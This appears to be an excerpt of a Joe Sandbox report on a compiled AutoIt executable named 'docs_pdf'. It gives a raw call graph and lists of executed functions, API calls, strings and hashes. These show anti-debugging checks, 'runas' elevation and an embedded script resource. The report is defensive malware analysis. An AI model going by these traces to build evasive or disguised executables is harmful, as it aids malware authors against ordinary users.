1723e0 100566->100567 100568 f9997 84 API calls 100567->100568 100569 1723ef 100568->100569 100570 f7b76 59 API calls 100569->100570 100571 172402 100570->100571 100572 f9997 84 API calls 100571->100572 100573 17240f 100572->100573 100574 17249d 100573->100574 100575 172429 100573->100575 100576 f9997 84 API calls 100574->100576 100823 f9c9c 59 API calls 100575->100823 100578 1724a2 100576->100578 100580 1724b0 100578->100580 100581 1724ce 100578->100581 100579 17242e 100582 17248c 100579->100582 100585 172445 100579->100585 100584 f9bf8 59 API calls 100580->100584 100589 1724e3 100581->100589 100824 f9c9c 59 API calls 100581->100824 100583 f9bf8 59 API calls 100582->100583 100602 172499 Mailbox 100583->100602 100584->100602 100587 f79ab 59 API calls 100585->100587 100588 172452 100587->100588 100592 f7c8e 59 API calls 100588->100592 100593 1724f8 100589->100593 100825 f9c9c 59 API calls 100589->100825 100591 f80d7 59 API calls 100594 172512 100591->100594 100596 172460 100592->100596 100593->100591 100804 14f8f2 100594->100804 100597 f79ab 59 API calls 100596->100597 100598 172479 100597->100598 100599 f7c8e 59 API calls 100598->100599 100601 172487 100599->100601 100826 f9b9c 59 API calls Mailbox 100601->100826 100602->100464 100604 f77c7 59 API calls 100603->100604 100605 16c608 100604->100605 100606 f77c7 59 API calls 100605->100606 100607 16c610 100606->100607 100608 f77c7 59 API calls 100607->100608 100609 16c618 100608->100609 100610 f9997 84 API calls 100609->100610 100623 16c626 100610->100623 100611 f7a84 59 API calls 100611->100623 100612 f7d2c 59 API calls 100612->100623 100613 16c80f 100614 16c83c Mailbox 100613->100614 100828 f9b9c 59 API calls Mailbox 100613->100828 100614->100423 100616 16c7f6 100619 f7e0b 59 API calls 100616->100619 100617 16c811 100620 f7e0b 59 API calls 100617->100620 100618 f81a7 59 API calls 100618->100623 100621 16c803 100619->100621 100622 16c820 100620->100622 100625 f7c8e 59 API calls 100621->100625 100626 f7c8e 59 API calls 100622->100626 100623->100611 100623->100612 100623->100613 100623->100614 100623->100616 100623->100617 100623->100618 100624 f7faf 59 API calls 100623->100624 100627 f7faf 59 API calls 100623->100627 100632 f9997 84 API calls 100623->100632 100633 f7e0b 59 API calls 100623->100633 100634 f7c8e 59 API calls 100623->100634 100628 16c6bd CharUpperBuffW 100624->100628 100625->100613 100626->100613 100629 16c77d CharUpperBuffW 100627->100629 100827 f859a 68 API calls 100628->100827 100631 fc707 69 API calls 100629->100631 100631->100623 100632->100623 100633->100623 100634->100623 100636 157bec 100635->100636 100637 110ff6 Mailbox 59 API calls 100636->100637 100638 157bfa 100637->100638 100639 f77c7 59 API calls 100638->100639 100640 157c08 100638->100640 100639->100640 100640->100423 100829 146636 100641->100829 100643 146702 100643->100423 100644->100433 100645->100433 100646->100464 100647->100459 100648->100449 100649->100419 100650->100423 100651->100423 100652->100423 100653->100464 100654->100438 100655->100456 100656->100456 100657->100456 100658->100427 100659->100422 100660->100427 100662 f9997 84 API calls 100661->100662 100663 16ce2e 100662->100663 100666 16ce75 Mailbox 100663->100666 100699 16dab9 100663->100699 100665 16d242 100738 16dbdc 92 API calls Mailbox 100665->100738 100666->100474 100669 16cec6 Mailbox 100669->100666 100673 f9997 84 API calls 100669->100673 100685 16d0cd 100669->100685 100731 15f835 59 API calls 2 library calls 100669->100731 100732 16d2f3 61 API calls 2 library calls 100669->100732 100670 16d251 100671 16d0db 100670->100671 100672 16d25d 100670->100672 100712 16cc82 100671->100712 100672->100666 100673->100669 100678 16d114 100727 110e48 100678->100727 100681 16d147 100683 f942e 59 API calls 100681->100683 100682 16d12e 100733 15a0b5 89 API calls 4 library calls 100682->100733 100686 16d153 100683->100686 100685->100665 100685->100671 100688 f91b0 59 API calls 100686->100688 100687 16d139 GetCurrentProcess TerminateProcess 100687->100681 100689 16d169 100688->100689 100698 16d190 100689->100698 100734 f8ea0 59 API calls Mailbox 100689->100734 100691 16d2b8 100691->100666 100695 16d2cc FreeLibrary 100691->100695 100692 16d17f 100735 16d95d 107 API calls _free 100692->100735 100695->100666 100698->100691 100736 f8ea0 59 API calls Mailbox 100698->100736 100737 f9e9c 60 API calls Mailbox 100698->100737 100739 16d95d 107 API calls _free 100698->100739 100700 f7faf 59 API calls 100699->100700 100701 16dad4 CharLowerBuffW 100700->100701 100740 14f658 100701->100740 100705 f77c7 59 API calls 100706 16db0d 100705->100706 100707 f79ab 59 API calls 100706->100707 100708 16db24 100707->100708 100709 f7e8c 59 API calls 100708->100709 100710 16db30 Mailbox 100709->100710 100711 16db6c Mailbox 100710->100711 100747 16d2f3 61 API calls 2 library calls 100710->100747 100711->100669 100713 16cc9d 100712->100713 100714 16ccf2 100712->100714 100715 110ff6 Mailbox 59 API calls 100713->100715 100718 16dd64 100714->100718 100717 16ccbf 100715->100717 100716 110ff6 Mailbox 59 API calls 100716->100717 100717->100714 100717->100716 100719 16df8d Mailbox 100718->100719 100726 16dd87 _strcat _wcscpy __wsetenvp 100718->100726 100719->100678 100720 f9cf8 59 API calls 100720->100726 100721 f9d46 59 API calls 100721->100726 100722 f9c9c 59 API calls 100722->100726 100723 f9997 84 API calls 100723->100726 100724 11594c 58 API calls std::exception::_Copy_str 100724->100726 100726->100719 100726->100720 100726->100721 100726->100722 100726->100723 100726->100724 100750 155b29 61 API calls 2 library calls 100726->100750 100728 110e5d 100727->100728 100729 110ef5 VirtualAlloc 100728->100729 100730 110ec3 100728->100730 100729->100730 100730->100681 100730->100682 100731->100669 100732->100669 100733->100687 100734->100692 100735->100698 100736->100698 100737->100698 100738->100670 100739->100698 100742 14f683 __wsetenvp 100740->100742 100741 14f6c2 100741->100705 100741->100710 100742->100741 100743 14f769 100742->100743 100744 14f6b8 100742->100744 100743->100741 100749 f7a24 61 API calls 100743->100749 100744->100741 100748 f7a24 61 API calls 100744->100748 100747->100711 100748->100744 100749->100743 100750->100726 100751->100477 100752->100521 100753->100520 100754->100482 100755->100517 100756->100517 100758 f56dd 100757->100758 100759 f5702 100757->100759 100758->100759 100763 f56ec 100758->100763 100760 f7eec 59 API calls 100759->100760 100764 15349a 100760->100764 100761 1534c9 100761->100556 100783 f5c18 100763->100783 100764->100761 100781 153436 ReadFile SetFilePointerEx 100764->100781 100782 f7a84 59 API calls 2 library calls 100764->100782 100771 1535d8 Mailbox 100771->100556 100772->100531 100773->100560 100774->100561 100775->100533 100776->100533 100777->100538 100778->100546 100779->100554 100780->100559 100781->100764 100782->100764 100784 110ff6 Mailbox 59 API calls 100783->100784 100785 f5c2b 100784->100785 100786 110ff6 Mailbox 59 API calls 100785->100786 100787 f5c37 100786->100787 100788 f5632 100787->100788 100795 f5a2f 100788->100795 100790 f5643 100791 f5d20 2 API calls 100790->100791 100792 f5674 100790->100792 100802 f5bda 59 API calls 2 library calls 100790->100802 100791->100790 100792->100771 100794 f793a 61 API calls Mailbox 100792->100794 100794->100771 100796 12e065 100795->100796 100797 f5a40 100795->100797 100803 146443 59 API calls Mailbox 100796->100803 100797->100790 100799 12e06f 100800 110ff6 Mailbox 59 API calls 100799->100800 100801 12e07b 100800->100801 100802->100790 100803->100799 100805 f77c7 59 API calls 100804->100805 100806 14f905 100805->100806 100807 f7b76 59 API calls 100806->100807 100808 14f919 100807->100808 100809 14f658 61 API calls 100808->100809 100819 14f93b 100808->100819 100811 14f935 100809->100811 100810 14f658 61 API calls 100810->100819 100812 f79ab 59 API calls 100811->100812 100811->100819 100812->100819 100813 14f9b5 100815 f79ab 59 API calls 100813->100815 100814 f79ab 59 API calls 100814->100819 100816 14f9ce 100815->100816 100818 f7c8e 59 API calls 100816->100818 100817 f7c8e 59 API calls 100817->100819 100820 14f9da 100818->100820 100819->100810 100819->100813 100819->100814 100819->100817 100821 f80d7 59 API calls 100820->100821 100822 14f9e9 Mailbox 100820->100822 100821->100822 100822->100601 100823->100579 100824->100589 100825->100593 100826->100602 100827->100623 100828->100614 100830 14665e 100829->100830 100831 146641 100829->100831 100830->100643 100831->100830 100833 146621 59 API calls Mailbox 100831->100833 100833->100831 100834 130226 100840 fade2 Mailbox 100834->100840 100836 130c86 100837 1466f4 Mailbox 59 API calls 100836->100837 100838 130c8f 100837->100838 100840->100836 100840->100838 100841 1300e0 VariantClear 100840->100841 100842 fb6c1 100840->100842 100844 16e237 130 API calls 100840->100844 100845 15d2e6 101 API calls 100840->100845 100846 102123 95 API calls 100840->100846 100847 16474d 331 API calls 100840->100847 100848 16e24b 130 API calls 100840->100848 100849 1723c9 87 API calls 100840->100849 100850 f9df0 59 API calls Mailbox 100840->100850 100851 147405 59 API calls 100840->100851 100841->100840 100852 15a0b5 89 API calls 4 library calls 100842->100852 100844->100840 100845->100840 100846->100840 100847->100840 100848->100840 100849->100840 100850->100840 100851->100840 100852->100836 100853 f568a 100854 f5c18 59 API calls 100853->100854 100855 f569c 100854->100855 100856 f5632 61 API calls 100855->100856 100857 f56aa 100856->100857 100859 f56ba Mailbox 100857->100859 100860 f81c1 61 API calls Mailbox 100857->100860 100860->100859 100861 f1016 100866 f4ad2 100861->100866 100864 112f80 __cinit 67 API calls 100865 f1025 100864->100865 100867 110ff6 Mailbox 59 API calls 100866->100867 100868 f4ada 100867->100868 100869 f101b 100868->100869 100873 f4a94 100868->100873 100869->100864 100874 f4a9d 100873->100874 100875 f4aaf 100873->100875 100876 112f80 __cinit 67 API calls 100874->100876 100877 f4afe 100875->100877 100876->100875 100878 f77c7 59 API calls 100877->100878 100879 f4b16 GetVersionExW 100878->100879 100880 f7d2c 59 API calls 100879->100880 100881 f4b59 100880->100881 100882 f7e8c 59 API calls 100881->100882 100893 f4b86 100881->100893 100883 f4b7a 100882->100883 100884 f7886 59 API calls 100883->100884 100884->100893 100885 f4bf1 GetCurrentProcess IsWow64Process 100886 f4c0a 100885->100886 100888 f4c89 GetSystemInfo 100886->100888 100889 f4c20 100886->100889 100887 12dc8d 100890 f4c56 100888->100890 100901 f4c95 100889->100901 100890->100869 100893->100885 100893->100887 100894 f4c7d GetSystemInfo 100896 f4c47 100894->100896 100895 f4c32 100897 f4c95 2 API calls 100895->100897 100896->100890 100899 f4c4d FreeLibrary 100896->100899 100898 f4c3a GetNativeSystemInfo 100897->100898 100898->100896 100899->100890 100902 f4c2e 100901->100902 100903 f4c9e LoadLibraryA 100901->100903 100902->100894 100902->100895 100903->100902 100904 f4caf GetProcAddress 100903->100904 100904->100902 100905 f1066 100910 ff8cf 100905->100910 100907 f106c 100908 112f80 __cinit 67 API calls 100907->100908 100909 f1076 100908->100909 100911 ff8f0 100910->100911 100943 110143 100911->100943 100915 ff937 100916 f77c7 59 API calls 100915->100916 100917 ff941 100916->100917 100918 f77c7 59 API calls 100917->100918 100919 ff94b 100918->100919 100920 f77c7 59 API calls 100919->100920 100921 ff955 100920->100921 100922 f77c7 59 API calls 100921->100922 100923 ff993 100922->100923 100924 f77c7 59 API calls 100923->100924 100925 ffa5e 100924->100925 100953 1060e7 100925->100953 100929 ffa90 100930 f77c7 59 API calls 100929->100930 100931 ffa9a 100930->100931 100981 10ffde 100931->100981 100933 ffae1 100934 ffaf1 GetStdHandle 100933->100934 100935 ffb3d 100934->100935 100936 1349d5 100934->100936 100937 ffb45 OleInitialize 100935->100937 100936->100935 100938 1349de 100936->100938 100937->100907 100988 156dda 64 API calls Mailbox 100938->100988 100940 1349e5 100989 1574a9 CreateThread 100940->100989 100942 1349f1 CloseHandle 100942->100937 100990 11021c 100943->100990 100946 11021c 59 API calls 100947 110185 100946->100947 100948 f77c7 59 API calls 100947->100948 100949 110191 100948->100949 100950 f7d2c 59 API calls 100949->100950 100951 ff8f6 100950->100951 100952 1103a2 6 API calls 100951->100952 100952->100915 100954 f77c7 59 API calls 100953->100954 100955 1060f7 100954->100955 100956 f77c7 59 API calls 100955->100956 100957 1060ff 100956->100957 100997 105bfd 100957->100997 100960 105bfd 59 API calls 100961 10610f 100960->100961 100962 f77c7 59 API calls 100961->100962 100963 10611a 100962->100963 100964 110ff6 Mailbox 59 API calls 100963->100964 100965 ffa68 100964->100965 100966 106259 100965->100966 100967 106267 100966->100967 100968 f77c7 59 API calls 100967->100968 100969 106272 100968->100969 100970 f77c7 59 API calls 100969->100970 100971 10627d 100970->100971 100972 f77c7 59 API calls 100971->100972 100973 106288 100972->100973 100974 f77c7 59 API calls 100973->100974 100975 106293 100974->100975 100976 105bfd 59 API calls 100975->100976 100977 10629e 100976->100977 100978 110ff6 Mailbox 59 API calls 100977->100978 100979 1062a5 RegisterWindowMessageW 100978->100979 100979->100929 100982 145cc3 100981->100982 100983 10ffee 100981->100983 101000 159d71 60 API calls 100982->101000 100985 110ff6 Mailbox 59 API calls 100983->100985 100987 10fff6 100985->100987 100986 145cce 100987->100933 100988->100940 100989->100942 101001 15748f 65 API calls 100989->101001 100991 f77c7 59 API calls 100990->100991 100992 110227 100991->100992 100993 f77c7 59 API calls 100992->100993 100994 11022f 100993->100994 100995 f77c7 59 API calls 100994->100995 100996 11017b 100995->100996 100996->100946 100998 f77c7 59 API calls 100997->100998 100999 105c05 100998->100999 100999->100960 101000->100986 101002 f1055 101007 f2649 101002->101007 101005 112f80 __cinit 67 API calls 101006 f1064 101005->101006 101008 f77c7 59 API calls 101007->101008 101009 f26b7 101008->101009 101014 f3582 101009->101014 101012 f2754 101013 f105a 101012->101013 101017 f3416 59 API calls 2 library calls 101012->101017 101013->101005 101018 f35b0 101014->101018 101017->101012 101019 f35a1 101018->101019 101020 f35bd 101018->101020 101019->101012 101020->101019 101021 f35c4 RegOpenKeyExW 101020->101021 101021->101019 101022 f35de RegQueryValueExW 101021->101022 101023 f3614 RegCloseKey 101022->101023 101024 f35ff 101022->101024 101023->101019 101024->101023 101025 f3633 101026 f366a 101025->101026 101027 f3688 101026->101027 101028 f36e7 101026->101028 101066 f36e5 101026->101066 101032 f375d PostQuitMessage 101027->101032 101033 f3695 101027->101033 101030 f36ed 101028->101030 101031 12d31c 101028->101031 101029 f36ca DefWindowProcW 101034 f36d8 101029->101034 101035 f3715 SetTimer RegisterWindowMessageW 101030->101035 101036 f36f2 101030->101036 101075 1011d0 10 API calls Mailbox 101031->101075 101032->101034 101037 12d38f 101033->101037 101038 f36a0 101033->101038 101035->101034 101042 f373e CreatePopupMenu 101035->101042 101040 f36f9 KillTimer 101036->101040 101041 12d2bf 101036->101041 101080 152a16 71 API calls _memset 101037->101080 101043 f36a8 101038->101043 101044 f3767 101038->101044 101070 f44cb Shell_NotifyIconW _memset 101040->101070 101048 12d2c4 101041->101048 101049 12d2f8 MoveWindow 101041->101049 101042->101034 101051 12d374 101043->101051 101052 f36b3 101043->101052 101073 f4531 64 API calls _memset 101044->101073 101046 12d343 101076 1011f3 331 API calls Mailbox 101046->101076 101057 12d2e7 SetFocus 101048->101057 101058 12d2c8 101048->101058 101049->101034 101051->101029 101079 14817e 59 API calls Mailbox 101051->101079 101055 f36be 101052->101055 101060 f374b 101052->101060 101053 12d3a1 101053->101029 101053->101034 101055->101029 101077 f44cb Shell_NotifyIconW _memset 101055->101077 101056 f375b 101056->101034 101057->101034 101058->101055 101061 12d2d1 101058->101061 101059 f370c 101071 f3114 DeleteObject DestroyWindow Mailbox 101059->101071 101072 f45df 81 API calls _memset 101060->101072 101074 1011d0 10 API calls Mailbox 101061->101074 101066->101029 101068 12d368 101078 f43db 68 API calls _memset 101068->101078 101070->101059 101071->101034 101072->101056 101073->101056 101074->101034 101075->101046 101076->101055 101077->101068 101078->101066 101079->101066 101080->101053 101081 36e23b0 101095 36e0000 101081->101095 101083 36e2448 101098 36e22a0 101083->101098 101101 36e3470 GetPEB 101095->101101 101097 36e068b 101097->101083 101099 36e22a9 Sleep 101098->101099 101100 36e22b7 101099->101100 101102 36e349a 101101->101102 101102->101097

                                                            Executed Functions

                                                            Function 000F3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000F3B7A
                                                            • IsDebuggerPresent.KERNEL32 ref: 000F3B8C
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,001B62F8,001B62E0,?,?), ref: 000F3BFD
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                              • Part of subcall function 00100A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000F3C26,001B62F8,?,?,?), ref: 00100ACE
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000F3C81
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001A93F0,00000010), ref: 0012D4BC
                                                            • SetCurrentDirectoryW.KERNEL32(?,001B62F8,?,?,?), ref: 0012D4F4
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001A5D40,001B62F8,?,?,?), ref: 0012D57A
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0012D581
                                                              • Part of subcall function 000F3A58: GetSysColorBrush.USER32(0000000F), ref: 000F3A62
                                                              • Part of subcall function 000F3A58: LoadCursorW.USER32(00000000,00007F00), ref: 000F3A71
                                                              • Part of subcall function 000F3A58: LoadIconW.USER32(00000063), ref: 000F3A88
                                                              • Part of subcall function 000F3A58: LoadIconW.USER32(000000A4), ref: 000F3A9A
                                                              • Part of subcall function 000F3A58: LoadIconW.USER32(000000A2), ref: 000F3AAC
                                                              • Part of subcall function 000F3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000F3AD2
                                                              • Part of subcall function 000F3A58: RegisterClassExW.USER32(?), ref: 000F3B28
                                                              • Part of subcall function 000F39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000F3A15
                                                              • Part of subcall function 000F39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000F3A36
                                                              • Part of subcall function 000F39E7: ShowWindow.USER32(00000000,?,?), ref: 000F3A4A
                                                              • Part of subcall function 000F39E7: ShowWindow.USER32(00000000,?,?), ref: 000F3A53
                                                              • Part of subcall function 000F43DB: _memset.LIBCMT ref: 000F4401
                                                              • Part of subcall function 000F43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000F44A6
                                                            Strings
                                                            • runas, xrefs: 0012D575
                                                            • This is a third-party compiled AutoIt script., xrefs: 0012D4B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 529118366-3287110873
                                                            • Opcode ID: 132b0f6cd6c0c28969b38c3de321aafbd20004fc9ea68ffcb071eabffdf5bb55
                                                            • Instruction ID: 2bf4cf3c94f812f4c6824e753790bc84d29feab5de459420710f066cb8b7c53c
                                                            • Opcode Fuzzy Hash: 132b0f6cd6c0c28969b38c3de321aafbd20004fc9ea68ffcb071eabffdf5bb55
                                                            • Instruction Fuzzy Hash: 7E51293090824CAEDF11EBB4EC05EFE7B74EF14310F0441B9F655669A2CB784A86EB61
                                                            Function 000F4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 996 f4afe-f4b5e call f77c7 GetVersionExW call f7d2c 1001 f4c69-f4c6b 996->1001 1002 f4b64 996->1002 1003 12db90-12db9c 1001->1003 1004 f4b67-f4b6c 1002->1004 1005 12db9d-12dba1 1003->1005 1006 f4b72 1004->1006 1007 f4c70-f4c71 1004->1007 1009 12dba3 1005->1009 1010 12dba4-12dbb0 1005->1010 1008 f4b73-f4baa call f7e8c call f7886 1006->1008 1007->1008 1018 12dc8d-12dc90 1008->1018 1019 f4bb0-f4bb1 1008->1019 1009->1010 1010->1005 1012 12dbb2-12dbb7 1010->1012 1012->1004 1014 12dbbd-12dbc4 1012->1014 1014->1003 1016 12dbc6 1014->1016 1020 12dbcb-12dbce 1016->1020 1021 12dc92 1018->1021 1022 12dca9-12dcad 1018->1022 1019->1020 1023 f4bb7-f4bc2 1019->1023 1024 12dbd4-12dbf2 1020->1024 1025 f4bf1-f4c08 GetCurrentProcess IsWow64Process 1020->1025 1026 12dc95 1021->1026 1030 12dc98-12dca1 1022->1030 1031 12dcaf-12dcb8 1022->1031 1027 12dc13-12dc19 1023->1027 1028 f4bc8-f4bca 1023->1028 1024->1025 1029 12dbf8-12dbfe 1024->1029 1032 f4c0d-f4c1e 1025->1032 1033 f4c0a 1025->1033 1026->1030 1038 12dc23-12dc29 1027->1038 1039 12dc1b-12dc1e 1027->1039 1034 12dc2e-12dc3a 1028->1034 1035 f4bd0-f4bd3 1028->1035 1036 12dc00-12dc03 1029->1036 1037 12dc08-12dc0e 1029->1037 1030->1022 1031->1026 1040 12dcba-12dcbd 1031->1040 1041 f4c89-f4c93 GetSystemInfo 1032->1041 1042 f4c20-f4c30 call f4c95 1032->1042 1033->1032 1046 12dc44-12dc4a 1034->1046 1047 12dc3c-12dc3f 1034->1047 1043 f4bd9-f4be8 1035->1043 1044 12dc5a-12dc5d 1035->1044 1036->1025 1037->1025 1038->1025 1039->1025 1040->1030 1045 f4c56-f4c66 1041->1045 1055 f4c7d-f4c87 GetSystemInfo 1042->1055 1056 f4c32-f4c3f call f4c95 1042->1056 1049 f4bee 1043->1049 1050 12dc4f-12dc55 1043->1050 1044->1025 1052 12dc63-12dc78 1044->1052 1046->1025 1047->1025 1049->1025 1050->1025 1053 12dc82-12dc88 1052->1053 1054 12dc7a-12dc7d 1052->1054 1053->1025 1054->1025 1057 f4c47-f4c4b 1055->1057 1061 f4c76-f4c7b 1056->1061 1062 f4c41-f4c45 GetNativeSystemInfo 1056->1062 1057->1045 1060 f4c4d-f4c50 FreeLibrary 1057->1060 1060->1045 1061->1062 1062->1057
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 000F4B2B
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            • GetCurrentProcess.KERNEL32(?,0017FAEC,00000000,00000000,?), ref: 000F4BF8
                                                            • IsWow64Process.KERNEL32(00000000), ref: 000F4BFF
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 000F4C45
                                                            • FreeLibrary.KERNEL32(00000000), ref: 000F4C50
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 000F4C81
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 000F4C8D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 70dafb64afe295a6a750c9ccc40835f69dc4c6cdb658db5e09726aa8b4905d1c
                                                            • Instruction ID: e4f04ce64b0c62572a9d298197832a28416b75101947070ea9426f04d536591a
                                                            • Opcode Fuzzy Hash: 70dafb64afe295a6a750c9ccc40835f69dc4c6cdb658db5e09726aa8b4905d1c
                                                            • Instruction Fuzzy Hash: BA91C53154A7C4DEC731CB68A5611BBBFE4AF2A300B48499DD5CA93E42D320E948D75A
                                                            Function 000F4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1063 f4fe9-f5001 CreateStreamOnHGlobal 1064 f5003-f501a FindResourceExW 1063->1064 1065 f5021-f5026 1063->1065 1066 12dd5c-12dd6b LoadResource 1064->1066 1067 f5020 1064->1067 1066->1067 1068 12dd71-12dd7f SizeofResource 1066->1068 1067->1065 1068->1067 1069 12dd85-12dd90 LockResource 1068->1069 1069->1067 1070 12dd96-12ddb4 1069->1070 1070->1067
                                                            APIs
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000F4EEE,?,?,00000000,00000000), ref: 000F4FF9
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000F4EEE,?,?,00000000,00000000), ref: 000F5010
                                                            • LoadResource.KERNEL32(?,00000000,?,?,000F4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000F4F8F), ref: 0012DD60
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,000F4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000F4F8F), ref: 0012DD75
                                                            • LockResource.KERNEL32(000F4EEE,?,?,000F4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000F4F8F,00000000), ref: 0012DD88
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: f442ae20c2f0fb243eb895c4549ab109d23df8955330cc3d943a1b56ff1b6e29
                                                            • Instruction ID: 6cc73c080f0756fa8927df6a7618fba9d5160fe4a22ee1650fa8e832aa29b045
                                                            • Opcode Fuzzy Hash: f442ae20c2f0fb243eb895c4549ab109d23df8955330cc3d943a1b56ff1b6e29
                                                            • Instruction Fuzzy Hash: 04115E75240704AFD7218B65EC58F677BB9EBC9B11F20416CF609C6660DB61EC819660
                                                            Function 000F492E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 000F4992
                                                              • Part of subcall function 001135AC: __lock.LIBCMT ref: 001135B2
                                                              • Part of subcall function 001135AC: DecodePointer.KERNEL32(00000001,?,000F49A7,001481BC), ref: 001135BE
                                                              • Part of subcall function 001135AC: EncodePointer.KERNEL32(?,?,000F49A7,001481BC), ref: 001135C9
                                                              • Part of subcall function 000F4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000F4A73
                                                              • Part of subcall function 000F4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000F4A88
                                                              • Part of subcall function 000F3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000F3B7A
                                                              • Part of subcall function 000F3B4C: IsDebuggerPresent.KERNEL32 ref: 000F3B8C
                                                              • Part of subcall function 000F3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,001B62F8,001B62E0,?,?), ref: 000F3BFD
                                                              • Part of subcall function 000F3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 000F3C81
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000F49D2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
